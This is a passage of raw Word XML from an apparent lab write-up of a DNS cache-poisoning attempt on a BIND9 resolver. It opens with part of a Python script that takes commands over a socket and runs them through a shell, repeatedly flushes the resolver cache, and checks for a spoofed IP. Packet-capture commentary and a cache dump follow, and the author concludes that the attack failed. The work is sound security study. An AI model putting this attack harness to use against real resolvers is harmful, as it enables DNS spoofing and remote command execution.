      <w:r>
        <w:t xml:space="preserve">         except socket.error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758F5FF3" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">            print('nope')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1860D80E" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">            time.sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564D3E6B" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">            continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C606496" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">         else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FFC6E7" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">            print('connected')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177E61DD" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">            connected=True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667D1BDF" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">            break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A329E1" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>conn(mysocket)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568A7DD8" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>mycmd=mysocket.recv(2048).decode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0AB0E5" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>#mysocket.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27310A79" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>t1=threading.Thread(target=worker, daemon=True,args='1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6B9029" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>t1.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C864451" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>time.sleep(.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F7C5F2" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>proc=subprocess.Popen(mycmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D71ABC1" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>t1.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD6F8F6" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>subprocess.run(['rndc', 'flush'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E19B3C7" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>mysocket.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B12E542" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>time.sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF1FA81" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>proc=subprocess.Popen(mycmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0424056D" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F0E2E9" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   global yoursocket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583E0D50" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   global not1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F919BE3" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   not1=False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70164DE5" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   yoursocket=socket.socket()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B742C1" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   conn(yoursocket)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B88A3A1" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   mycmd=yoursocket.recv(2048).decode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FA3632" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   t1=threading.Thread(target=worker, daemon=True,args='0')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FE0CC8" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   t1.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3D2ECC" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   time.sleep(.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F390F4A" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   subprocess.run(['rndc', 'flush'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0C7927" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   proc=subprocess.Popen(mycmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38909CF8" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   t1.join()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE29ABB" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   if not1 == True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7656BA18" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">      yoursocket.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782E1377" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">      continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AADBA0A" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   yoursocket.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C6C436" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   time.sleep(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05621666" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   subprocess.run(['rndc', 'flush'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F02052C" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   proc=subprocess.Popen(mycmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8D32B7" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   result=proc.stdout.read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DF6621" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">   if b'SERVFAIL' in result or b'222.173.190.239' in result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5DDD0D" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF60620" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>#   print(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F55E19F" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D"/>
    <w:p w14:paraId="1CBD9576" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>-------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301B9DB8" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D"/>
    <w:p w14:paraId="2E7E6B1F" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D"/>
    <w:p w14:paraId="42E03E7B" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D"/>
    <w:p w14:paraId="2FC9D3B2" w14:textId="19CA39A4" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A43A82A" wp14:editId="65A5945D">
            <wp:extent cx="4176889" cy="2349500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="190027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179043" cy="2350712"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCB136D" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D"/>
    <w:p w14:paraId="45B52C8A" w14:textId="1D348DCB" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">This screenshot shows a packet capture from the resolver that is </w:t>
      </w:r>
      <w:r>
        <w:t>receiving</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> responses from the poisoner with an </w:t>
      </w:r>
      <w:r>
        <w:t>incrementing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ip ID. You can see that one of the spoofed packets has the same ip ID as the real response. Because the poisoned response was </w:t>
      </w:r>
      <w:r>
        <w:t>received</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> first, it is accepted even though it was </w:t>
      </w:r>
      <w:r>
        <w:t>received</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> before the query request had been sent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527A925B" w14:textId="5CC2E1D8" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FF5206E" wp14:editId="46312001">
            <wp:extent cx="4889500" cy="2750344"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="19034478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47858" name="Picture 2"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92720" cy="2752155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="434DA04C" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D"/>
    <w:p w14:paraId="140B6B63" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D"/>
    <w:p w14:paraId="15237E66" w14:textId="2E1DBEFC" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t xml:space="preserve">You can see there was no indication of a </w:t>
      </w:r>
      <w:r>
        <w:t>malformed</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> packet and the A record responses are sorted, which is how the A records are returned with no poisoning. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB4C2D5" w14:textId="10064795" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="752284D2" wp14:editId="282C4A75">
            <wp:extent cx="4705350" cy="2646760"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="2419582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58214" name="Picture 3"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11148" cy="2650021"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA32C8F" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D"/>
    <w:p w14:paraId="10F15939" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>I go to see if the cache was poisoned on the recursive resolver with 'rndc dumpdb -cache' and I get</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F88912" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D"/>
    <w:p w14:paraId="7AAF3534" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E98F88A" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D83884C" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>; Start view _default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A108DFE" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682446ED" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C1E377" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>; Cache dump of view '_default' (cache _default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73401F40" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFBBDFA" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>; using a 0 second stale ttl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB41708" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>$DATE 20230419154106</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E46772" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15615C94" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>; Address database dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53295D46" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EC3984" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>; [edns success/timeout]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25677D28" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>; [plain success/timeout]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E393948" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44573927" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61385745" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>; Unassociated entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4978E48E" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE50A68" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;       3.113.25.188 [srtt 51010] [flags 00000000] [edns 0/1] [plain 0/0] [ttl 1753]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CD0410" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522189D7" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>; Bad cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB1E780" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230B1702" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7E64CA" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>; SERVFAIL cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AED9B02" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48607EDB" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EF7D50" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>; Start view _bind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A7332A" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6762A893" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE9F2D5" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>; Cache dump of view '_bind' (cache _bind)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0015B0A5" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B26668F" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>; using a 0 second stale ttl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3953C4" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>$DATE 20230419154106</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114F6930" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8307F7" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>; Address database dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D56B0A" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D785671" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>; [edns success/timeout]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9917F9" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>; [plain success/timeout]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48398D03" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E3991C" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5075AC06" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>; Unassociated entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D554EC0" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBAFD28" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8EC678" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>; Bad cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C60A263" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0242A408" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519B883E" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>; SERVFAIL cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C69B59" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C429A99" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>; Dump complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42319D53" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046D4668" w14:textId="77777777" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D"/>
    <w:p w14:paraId="06969F90" w14:textId="6F32C1AB" w:rsidR="008E786D" w:rsidRDefault="008E786D" w:rsidP="008E786D">
      <w:r>
        <w:t>This must be a result of awarness to this type of attack, and a patch to the bind9 software. After all of this, the attack was a complete failure and therefore has a low threat score in my opinion. Of course a more skilled attacker might have a better insight. You can see in my script on the puppet machine I use `rndc flush` frequently. This is directly interfering with the resolver and would not work in a real exploit. The attacker would simply have to wait until the cache is flushed on its own, making this attack even more unlikely.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008E78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86D"/>
    <w:rsid w:val="008E7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F3570"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EE20AC40-C3E7-4C3F-AC08-7E3E6FE04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11</Pages>
  <Words>1799</Words>
  <Characters>10260</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>85</Lines>
  <Paragraphs>24</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>12035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stevens</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>grant stevens</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-13T06:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-13T06:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>